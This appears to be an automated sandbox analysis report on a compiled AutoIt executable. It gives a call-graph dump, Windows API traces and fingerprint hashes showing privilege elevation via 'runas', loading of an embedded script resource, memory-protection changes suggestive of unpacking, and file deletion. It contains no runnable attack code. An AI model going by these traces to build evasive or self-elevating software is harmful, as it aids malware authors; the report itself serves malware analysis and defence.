LoadLibraryA 105544->105546 105545->105349 105545->105352 105546->105545 105547 b54c50 GetProcAddress 105546->105547 105547->105545 105549 b70db6 Mailbox 59 API calls 105548->105549 105550 b55240 105549->105550 105550->105357 105552 b54ea3 FindResourceExW 
105551->105552 105556 b54ec0 105551->105556 105553 b8d933 LoadResource 105552->105553 105552->105556 105554 b8d948 SizeofResource 105553->105554 105553->105556 105555 b8d95c LockResource 105554->105555 105554->105556 105555->105556 105556->105358 105558 b54ef4 105557->105558 105559 b8d9ab 105557->105559 105563 b7584d 105558->105563 105561 b54f02 105561->105369 105562->105358 105566 b75859 __initptd 105563->105566 105564 b7586b 105576 b78b28 58 API calls __getptd_noexit 105564->105576 105566->105564 105567 b75891 105566->105567 105578 b76c11 105567->105578 105568 b75870 105577 b78db6 9 API calls __mbschr_l 105568->105577 105571 b75897 105584 b757be 83 API calls 5 library calls 105571->105584 105573 b758a6 105585 b758c8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105573->105585 105575 b7587b __initptd 105575->105561 105576->105568 105577->105575 105579 b76c43 RtlEnterCriticalSection 105578->105579 105580 b76c21 105578->105580 105583 b76c39 105579->105583 105580->105579 105581 b76c29 105580->105581 105582 b79c0b __lock 58 API calls 105581->105582 105582->105583 105583->105571 105584->105573 105585->105575 105589 b755fd 105586->105589 105588 b54f2e 105588->105377 105590 b75609 __initptd 105589->105590 105591 b7564c 105590->105591 105592 b75644 __initptd 105590->105592 105597 b7561f _memset 105590->105597 105593 b76c11 __lock_file 59 API calls 105591->105593 105592->105588 105594 b75652 105593->105594 105602 b7541d 105594->105602 105616 b78b28 58 API calls __getptd_noexit 105597->105616 105598 b75639 105617 b78db6 9 API calls __mbschr_l 105598->105617 105603 b75453 105602->105603 105606 b75438 _memset 105602->105606 105618 b75686 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105603->105618 105604 b75443 105714 b78b28 58 API calls __getptd_noexit 105604->105714 105606->105603 105606->105604 105609 b75493 105606->105609 105609->105603 105610 b755a4 _memset 105609->105610 105619 b746e6 105609->105619 105626 b80e5b 105609->105626 105694 b80ba7 
105609->105694 105716 b80cc8 58 API calls 3 library calls 105609->105716 105717 b78b28 58 API calls __getptd_noexit 105610->105717 105615 b75448 105715 b78db6 9 API calls __mbschr_l 105615->105715 105616->105598 105617->105592 105618->105592 105620 b74705 105619->105620 105621 b746f0 105619->105621 105620->105609 105718 b78b28 58 API calls __getptd_noexit 105621->105718 105623 b746f5 105719 b78db6 9 API calls __mbschr_l 105623->105719 105625 b74700 105625->105609 105627 b80e7c 105626->105627 105628 b80e93 105626->105628 105729 b78af4 58 API calls __getptd_noexit 105627->105729 105629 b815cb 105628->105629 105633 b80ecd 105628->105633 105745 b78af4 58 API calls __getptd_noexit 105629->105745 105632 b80e81 105730 b78b28 58 API calls __getptd_noexit 105632->105730 105636 b80ed5 105633->105636 105642 b80eec 105633->105642 105634 b815d0 105746 b78b28 58 API calls __getptd_noexit 105634->105746 105731 b78af4 58 API calls __getptd_noexit 105636->105731 105639 b80ee1 105747 b78db6 9 API calls __mbschr_l 105639->105747 105640 b80eda 105732 b78b28 58 API calls __getptd_noexit 105640->105732 105643 b80f01 105642->105643 105644 b80f1b 105642->105644 105647 b80f39 105642->105647 105674 b80e88 105642->105674 105733 b78af4 58 API calls __getptd_noexit 105643->105733 105644->105643 105649 b80f26 105644->105649 105734 b7881d 58 API calls 2 library calls 105647->105734 105720 b85c6b 105649->105720 105650 b80f49 105652 b80f6c 105650->105652 105653 b80f51 105650->105653 105737 b818c1 60 API calls 3 library calls 105652->105737 105735 b78b28 58 API calls __getptd_noexit 105653->105735 105654 b8103a 105657 b810b3 ReadFile 105654->105657 105658 b81050 GetConsoleMode 105654->105658 105660 b81593 GetLastError 105657->105660 105661 b810d5 105657->105661 105662 b810b0 105658->105662 105663 b81064 105658->105663 105659 b80f56 105736 b78af4 58 API calls __getptd_noexit 105659->105736 105665 b815a0 105660->105665 105666 b81093 105660->105666 105661->105660 105669 b810a5 105661->105669 
105662->105657 105663->105662 105667 b8106a ReadConsoleW 105663->105667 105743 b78b28 58 API calls __getptd_noexit 105665->105743 105679 b81099 105666->105679 105738 b78b07 58 API calls 3 library calls 105666->105738 105667->105669 105670 b8108d GetLastError 105667->105670 105676 b8110a 105669->105676 105677 b81377 105669->105677 105669->105679 105670->105666 105672 b815a5 105744 b78af4 58 API calls __getptd_noexit 105672->105744 105674->105609 105675 b72d55 _free 58 API calls 105675->105674 105678 b811f7 105676->105678 105681 b81176 ReadFile 105676->105681 105677->105679 105682 b8147d ReadFile 105677->105682 105678->105679 105684 b812b4 105678->105684 105685 b812a4 105678->105685 105688 b81264 MultiByteToWideChar 105678->105688 105679->105674 105679->105675 105683 b81197 GetLastError 105681->105683 105692 b811a1 105681->105692 105687 b814a0 GetLastError 105682->105687 105693 b814ae 105682->105693 105683->105692 105684->105688 105741 b818c1 60 API calls 3 library calls 105684->105741 105740 b78b28 58 API calls __getptd_noexit 105685->105740 105687->105693 105688->105670 105688->105679 105692->105676 105739 b818c1 60 API calls 3 library calls 105692->105739 105693->105677 105742 b818c1 60 API calls 3 library calls 105693->105742 105695 b80bb2 105694->105695 105699 b80bc7 105694->105699 105781 b78b28 58 API calls __getptd_noexit 105695->105781 105697 b80bb7 105782 b78db6 9 API calls __mbschr_l 105697->105782 105700 b80bfc 105699->105700 105706 b80bc2 105699->105706 105783 b85fe4 58 API calls __malloc_crt 105699->105783 105702 b746e6 __flswbuf 58 API calls 105700->105702 105703 b80c10 105702->105703 105748 b80d47 105703->105748 105705 b80c17 105705->105706 105707 b746e6 __flswbuf 58 API calls 105705->105707 105706->105609 105708 b80c3a 105707->105708 105708->105706 105709 b746e6 __flswbuf 58 API calls 105708->105709 105710 b80c46 105709->105710 105710->105706 105711 b746e6 __flswbuf 58 API calls 105710->105711 105712 b80c53 105711->105712 105713 b746e6 __flswbuf 58 
API calls 105712->105713 105713->105706 105714->105615 105715->105603 105716->105609 105717->105615 105718->105623 105719->105625 105721 b85c83 105720->105721 105722 b85c76 105720->105722 105724 b85c8f 105721->105724 105725 b78b28 __mbschr_l 58 API calls 105721->105725 105723 b78b28 __mbschr_l 58 API calls 105722->105723 105726 b85c7b 105723->105726 105724->105654 105727 b85cb0 105725->105727 105726->105654 105728 b78db6 __mbschr_l 9 API calls 105727->105728 105728->105726 105729->105632 105730->105674 105731->105640 105732->105639 105733->105640 105734->105650 105735->105659 105736->105674 105737->105649 105738->105679 105739->105692 105740->105679 105741->105688 105742->105693 105743->105672 105744->105679 105745->105634 105746->105639 105747->105674 105749 b80d53 __initptd 105748->105749 105750 b80d60 105749->105750 105751 b80d77 105749->105751 105753 b78af4 __close 58 API calls 105750->105753 105752 b80e3b 105751->105752 105754 b80d8b 105751->105754 105755 b78af4 __close 58 API calls 105752->105755 105756 b80d65 105753->105756 105758 b80da9 105754->105758 105759 b80db6 105754->105759 105760 b80dae 105755->105760 105757 b78b28 __mbschr_l 58 API calls 105756->105757 105768 b80d6c __initptd 105757->105768 105761 b78af4 __close 58 API calls 105758->105761 105762 b80dd8 105759->105762 105763 b80dc3 105759->105763 105764 b78b28 __mbschr_l 58 API calls 105760->105764 105761->105760 105766 b7d206 ___lock_fhandle 59 API calls 105762->105766 105765 b78af4 __close 58 API calls 105763->105765 105772 b80dd0 105764->105772 105769 b80dc8 105765->105769 105767 b80dde 105766->105767 105770 b80df1 105767->105770 105771 b80e04 105767->105771 105768->105705 105773 b78b28 __mbschr_l 58 API calls 105769->105773 105774 b80e5b __read_nolock 70 API calls 105770->105774 105776 b78b28 __mbschr_l 58 API calls 105771->105776 105775 b78db6 __mbschr_l 9 API calls 105772->105775 105773->105772 105777 b80dfd 105774->105777 105775->105768 105778 b80e09 105776->105778 105780 b80e33 __read 
RtlLeaveCriticalSection 105777->105780 105779 b78af4 __close 58 API calls 105778->105779 105779->105777 105780->105768 105781->105697 105782->105706 105783->105700 105785 b75c6c __initptd 105784->105785 105786 b75c93 105785->105786 105787 b75c7e 105785->105787 105789 b76c11 __lock_file 59 API calls 105786->105789 105798 b78b28 58 API calls __getptd_noexit 105787->105798 105791 b75c99 105789->105791 105790 b75c83 105799 b78db6 9 API calls __mbschr_l 105790->105799 105800 b758d0 67 API calls 6 library calls 105791->105800 105794 b75ca4 105801 b75cc4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105794->105801 105796 b75cb6 105797 b75c8e __initptd 105796->105797 105797->105381 105798->105790 105799->105797 105800->105794 105801->105796 105802->105237 105803->105245 105804->105258 105805->105260 105806->105257 105807->105267 105809 b59169 Mailbox 105808->105809 105810 b8f19f 105809->105810 105815 b59173 105809->105815 105811 b70db6 Mailbox 59 API calls 105810->105811 105812 b8f1ab 105811->105812 105813 b5917a 105813->105272 105815->105813 105816 b59c90 59 API calls Mailbox 105815->105816 105816->105815 105817->105277 105818->105274 105819->105286 105820->105304 105822 bb8b11 105821->105822 105823 bb8b1f 105821->105823 105824 b7525b 115 API calls 105822->105824 105825 bb8b64 105823->105825 105826 b7525b 115 API calls 105823->105826 105848 bb8b28 105823->105848 105824->105823 105852 bb8d91 105825->105852 105827 bb8b49 105826->105827 105827->105825 105829 bb8b52 105827->105829 105833 b753a6 __fcloseall 83 API calls 105829->105833 105829->105848 105830 bb8ba8 105831 bb8bcd 105830->105831 105832 bb8bac 105830->105832 105856 bb89a9 105831->105856 105835 bb8bb9 105832->105835 105837 b753a6 __fcloseall 83 API calls 105832->105837 105833->105848 105838 b753a6 __fcloseall 83 API calls 105835->105838 105835->105848 105837->105835 105838->105848 105839 bb8bfb 105865 bb8c2b 105839->105865 105840 bb8bdb 105842 bb8be8 105840->105842 105844 b753a6 __fcloseall 83 API calls 
107573 b5718b 107572->107573 107574 b57d8c 59 API calls 107573->107574 107575 b57194 RegOpenKeyExW 107574->107575 107576 b8e8b1 RegQueryValueExW 107575->107576 107580 b571b6 Mailbox 107575->107580 107577 b8e8ce 107576->107577 107578 b8e943 RegCloseKey 107576->107578 107579 b70db6 Mailbox 59 API calls 107577->107579 107578->107580 107590 b8e955 _wcscat Mailbox __NMSG_WRITE 107578->107590 107581 b8e8e7 107579->107581 107580->107557 107583 b5522e 59 API calls 107581->107583 107582 b579f2 59 API calls 107582->107590 107584 b8e8f2 RegQueryValueExW 107583->107584 107585 b8e90f 107584->107585 107587 b8e929 107584->107587 107586 b57bcc 59 API calls 107585->107586 107586->107587 107587->107578 107588 b57de1 59 API calls 107588->107590 107589 b53f74 59 API calls 107589->107590 107590->107580 107590->107582 107590->107588 107590->107589 107592 b81940 __write_nolock 107591->107592 107593 b70518 GetFullPathNameW 107592->107593 107594 b7053a 107593->107594 107595 b57bcc 59 API calls 107594->107595 107596 b57165 107595->107596 107596->107568 107597 b5e5ab 107600 b5d100 107597->107600 107599 b5e5b9 107601 b5d11d 107600->107601 107629 b5d37d 107600->107629 107602 b92691 107601->107602 107603 b926e0 107601->107603 107632 b5d144 107601->107632 107606 b92694 107602->107606 107614 b926af 107602->107614 107644 bca3e6 341 API calls __cinit 107603->107644 107607 b926a0 107606->107607 107606->107632 107642 bca9fa 341 API calls 107607->107642 107608 b72d40 __cinit 67 API calls 107608->107632 107611 b5d434 107636 b58a52 68 API calls 107611->107636 107612 b928b5 107612->107612 107613 b5d54b 107613->107599 107614->107629 107643 bcaea2 341 API calls 3 library calls 107614->107643 107618 b5d443 107618->107599 107619 b927fc 107648 bca751 89 API calls 107619->107648 107622 b584c0 69 API calls 107622->107632 107629->107613 107649 bb9e4a 89 API calls 4 library calls 107629->107649 107630 b59ea0 341 API calls 107630->107632 107631 b58047 59 API calls 107631->107632 107632->107608 107632->107611 
107632->107613 107632->107619 107632->107622 107632->107629 107632->107630 107632->107631 107634 b58740 68 API calls __cinit 107632->107634 107635 b58542 68 API calls 107632->107635 107637 b5843a 68 API calls 107632->107637 107638 b5cf7c 341 API calls 107632->107638 107639 b59dda 59 API calls Mailbox 107632->107639 107640 b5cf00 89 API calls 107632->107640 107641 b5cd7d 341 API calls 107632->107641 107645 b58a52 68 API calls 107632->107645 107646 b59d3c 60 API calls Mailbox 107632->107646 107647 ba678d 60 API calls 107632->107647 107634->107632 107635->107632 107636->107618 107637->107632 107638->107632 107639->107632 107640->107632 107641->107632 107642->107613 107643->107629 107644->107632 107645->107632 107646->107632 107647->107632 107648->107629 107649->107612 107650 b5552a 107651 b55ab8 59 API calls 107650->107651 107652 b5553c 107651->107652 107653 b554d2 61 API calls 107652->107653 107654 b5554a 107653->107654 107656 b5555a Mailbox 107654->107656 107657 b58061 61 API calls Mailbox 107654->107657 107657->107656

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B53B68
                                              • IsDebuggerPresent.KERNEL32 ref: 00B53B7A
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C152F8,00C152E0,?,?), ref: 00B53BEB
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                • Part of subcall function 00B6092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B53C14,00C152F8,?,?,?), ref: 00B6096E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B53C6F
                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C07770,00000010), ref: 00B8D281
                                              • SetCurrentDirectoryW.KERNEL32(?,00C152F8,?,?,?), ref: 00B8D2B9
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C04260,00C152F8,?,?,?), ref: 00B8D33F
                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B8D346
                                                • Part of subcall function 00B53A46: GetSysColorBrush.USER32(0000000F), ref: 00B53A50
                                                • Part of subcall function 00B53A46: LoadCursorW.USER32(00000000,00007F00), ref: 00B53A5F
                                                • Part of subcall function 00B53A46: LoadIconW.USER32(00000063), ref: 00B53A76
                                                • Part of subcall function 00B53A46: LoadIconW.USER32(000000A4), ref: 00B53A88
                                                • Part of subcall function 00B53A46: LoadIconW.USER32(000000A2), ref: 00B53A9A
                                                • Part of subcall function 00B53A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B53AC0
                                                • Part of subcall function 00B53A46: RegisterClassExW.USER32(?), ref: 00B53B16
                                                • Part of subcall function 00B539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B53A03
                                                • Part of subcall function 00B539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B53A24
                                                • Part of subcall function 00B539D5: ShowWindow.USER32(00000000,?,?), ref: 00B53A38
                                                • Part of subcall function 00B539D5: ShowWindow.USER32(00000000,?,?), ref: 00B53A41
                                                • Part of subcall function 00B5434A: _memset.LIBCMT ref: 00B54370
                                                • Part of subcall function 00B5434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B54415
                                              Strings
                                              • This is a third-party compiled AutoIt script., xrefs: 00B8D279
                                              • runas, xrefs: 00B8D33A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                              • API String ID: 529118366-3287110873
                                              • Opcode ID: a22cf691f5ee570915250ec48cd9d4b491797b99c62f462a7098d98f5016a75e
                                              • Instruction ID: f2358336adf61647857a3442c2a1330213cf40bb9ebeca1fb73897be9766e568
                                              • Opcode Fuzzy Hash: a22cf691f5ee570915250ec48cd9d4b491797b99c62f462a7098d98f5016a75e
                                              • Instruction Fuzzy Hash: E651D771E48209EADF11EBB4DC55BED7BF4EB46741F0080E6F811A32A1DA705649CB21

                                              Control-flow Graph

                                              APIs
                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00B536D2
                                              • KillTimer.USER32(?,00000001), ref: 00B536FC
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B5371F
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B5372A
                                              • CreatePopupMenu.USER32 ref: 00B5373E
                                              • PostQuitMessage.USER32(00000000), ref: 00B5374D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                              • String ID: TaskbarCreated
                                              • API String ID: 157504867-2362178303
                                              • Opcode ID: 3d8a50a919a67ad374dd52bd80df8db0b748cca966427aee0ca00c677a23c7d4
                                              • Instruction ID: 91ddd5d12f022b534c15da0734c42e2a78431dc73081d16e03203f96ca528fc6
                                              • Opcode Fuzzy Hash: 3d8a50a919a67ad374dd52bd80df8db0b748cca966427aee0ca00c677a23c7d4
                                              • Instruction Fuzzy Hash: 914146B2608505EBDB106F64DC49BFD37D4EB86782F1401EAFD02963E1DA709E499321

                                              Control-flow Graph

                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00B549CD
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • GetCurrentProcess.KERNEL32(?,00BDFAEC,00000000,00000000,?), ref: 00B54A9A
                                              • IsWow64Process.KERNEL32(00000000), ref: 00B54AA1
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B54AE7
                                              • FreeLibrary.KERNEL32(00000000), ref: 00B54AF2
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00B54B23
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00B54B2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: 48ea6e9e2fc457bb20246a5e149ec6d74e68c86d625acb1246d91ec75fadcfbc
                                              • Instruction ID: 13d948d2faf39dfa44346c496186d2508432f5bf0d5d287b6e7a90111d17d41d
                                              • Opcode Fuzzy Hash: 48ea6e9e2fc457bb20246a5e149ec6d74e68c86d625acb1246d91ec75fadcfbc
                                              • Instruction Fuzzy Hash: 6991E43198E7C1DEC731DB6894902AAFFF5AF2A305B0449EED4CB93A41D720A94CC759

                                              Control-flow Graph

                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B54E99
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B54D8E,?,?,00000000,00000000), ref: 00B54EB0
                                              • LoadResource.KERNEL32(?,00000000,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F), ref: 00B8D937
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F), ref: 00B8D94C
                                              • LockResource.KERNEL32(00B54D8E,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F,00000000), ref: 00B8D95F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: d27da2dbde1cd6160a86f5042ebacd12cfed8c1fa385aec243d18a43237c4ce5
                                              • Instruction ID: f9c6467a54eea3498d31bc3bf770d0c945514534443778d9f6e6d3d93c6a3b7b
                                              • Opcode Fuzzy Hash: d27da2dbde1cd6160a86f5042ebacd12cfed8c1fa385aec243d18a43237c4ce5
                                              • Instruction Fuzzy Hash: F4119E70200701BFD7258B65EC49F37BBFAFBC5B11F1482ADF80686260EB61E8448A60

                                              Control-flow Graph

                                              APIs
                                              • LoadLibraryA.KERNEL32(?), ref: 00CB2B9A
                                              • GetProcAddress.KERNEL32(?,00CABFF9), ref: 00CB2BB8
                                              • ExitProcess.KERNEL32(?,00CABFF9), ref: 00CB2BC9
                                              • VirtualProtect.KERNELBASE(00B50000,00001000,00000004,?,00000000), ref: 00CB2C17
                                              • VirtualProtect.KERNELBASE(00B50000,00001000), ref: 00CB2C2C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                              • String ID:
                                              • API String ID: 1996367037-0
                                              • Opcode ID: f7649bca48d54fbb4d5f46f2128329ff7c3409fe8a7a178a3b209fb7db3d13b3
                                              • Instruction ID: dcc2312d98d8a7b6d5279f573ad6d886ce5a452523c0571976df9453da11183e
                                              • Opcode Fuzzy Hash: f7649bca48d54fbb4d5f46f2128329ff7c3409fe8a7a178a3b209fb7db3d13b3
                                              • Instruction Fuzzy Hash: 2D513772A553524BD7349EB8CCC06E1BBA4EB15324F280738C5F2CB3C6EBA45D0697A0
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00B8E398), ref: 00BB446A
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00BB447B
                                              • FindClose.KERNEL32(00000000), ref: 00BB448B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: 7dd5904be97a56a07406d824fd865882563f7b46c3c0ed82448e8e063369b432
                                              • Instruction ID: ec07c44c86e87c5da325d1d17042b70774d1bec61969d29a2a6664219b07f6a0
                                              • Opcode Fuzzy Hash: 7dd5904be97a56a07406d824fd865882563f7b46c3c0ed82448e8e063369b432
                                              • Instruction Fuzzy Hash: 5EE0D8324155016B42106B38EC4D4F9B79CEE05335F100766F836C21D0FFB459109595
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B60A5B
                                              • timeGetTime.WINMM ref: 00B60D16
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B60E53
                                              • Sleep.KERNEL32(0000000A), ref: 00B60E61
                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00B60EFA
                                              • DestroyWindow.USER32 ref: 00B60F06
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B60F20
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00B94E83
                                              • TranslateMessage.USER32(?), ref: 00B95C60
                                              • DispatchMessageW.USER32(?), ref: 00B95C6E
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B95C82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                              • API String ID: 4212290369-3242690629
                                              • Opcode ID: 0aeca4524dbf1a892957b01eee2075d47ff3e817545c89b2ec50db78db497036
                                              • Instruction ID: 3113808b4cc884c5e4316c7baa4c015fc4087e75e14ff2311b3a452a995ed691
                                              • Opcode Fuzzy Hash: 0aeca4524dbf1a892957b01eee2075d47ff3e817545c89b2ec50db78db497036
                                              • Instruction Fuzzy Hash: 51B2D170608741DFDB35DF24C884BAAB7E4FF85304F1489ADE99A972A1DB74E844CB42

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00BB8F5F: __time64.LIBCMT ref: 00BB8F69
                                                • Part of subcall function 00B54EE5: _fseek.LIBCMT ref: 00B54EFD
                                              • __wsplitpath.LIBCMT ref: 00BB9234
                                                • Part of subcall function 00B740FB: __wsplitpath_helper.LIBCMT ref: 00B7413B
                                              • _wcscpy.LIBCMT ref: 00BB9247
                                              • _wcscat.LIBCMT ref: 00BB925A
                                              • __wsplitpath.LIBCMT ref: 00BB927F
                                              • _wcscat.LIBCMT ref: 00BB9295
                                              • _wcscat.LIBCMT ref: 00BB92A8
                                                • Part of subcall function 00BB8FA5: _memmove.LIBCMT ref: 00BB8FDE
                                                • Part of subcall function 00BB8FA5: _memmove.LIBCMT ref: 00BB8FED
                                              • _wcscmp.LIBCMT ref: 00BB91EF
                                                • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9824
                                                • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9837
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BB9452
                                              • _wcsncpy.LIBCMT ref: 00BB94C5
                                              • DeleteFileW.KERNEL32(?,?), ref: 00BB94FB
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BB9511
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB9522
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB9534
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
